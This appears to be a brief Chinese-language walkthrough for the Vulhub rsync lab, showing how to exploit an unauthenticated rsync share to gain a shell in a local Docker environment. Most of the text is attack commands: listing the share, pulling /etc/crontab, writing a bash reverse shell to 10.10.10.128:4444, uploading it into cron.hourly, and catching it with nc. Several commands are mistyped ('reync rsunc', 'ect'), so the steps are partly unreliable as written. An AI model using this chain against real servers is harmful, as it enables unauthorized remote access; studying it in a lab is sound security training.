Rsync反弹shell
环境下载:https://vulhub.org/#/docs/,解释很清楚,先将环境搭建起来
将文件下载到dkcer下
1、开启docker
进入:vulhub-master/rsunc/common
开启:sudo docker-compose up
2、端口扫描
3、使用rsync协议连接目标主机
rsync rsync://10.10.10.131/src/
4、查看crontab配置文件
reync rsunc://10.10.10.131/src/etc/crontab
5、下载crontab配置文件,查看配置,每小时的17分执行命令/etc/crontab,每个人都不一样,自行查看,我是17
reync rsunc://10.10.10.131/src/etc/crontab ~/crontab.txt
6、创建shell文件,ip一定要是攻击的哦,4444是为了与其他端口冲突,可以随意
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.10.128/4444 0>&1
7、授权
chmod 777 shell
8、上传,根据自己虚拟的ip
rsync -av shell rsync://10.10.10.131/src/ect/cron.hourly
9、监听,静静等待17分的到来
nc -nvv -lp 4444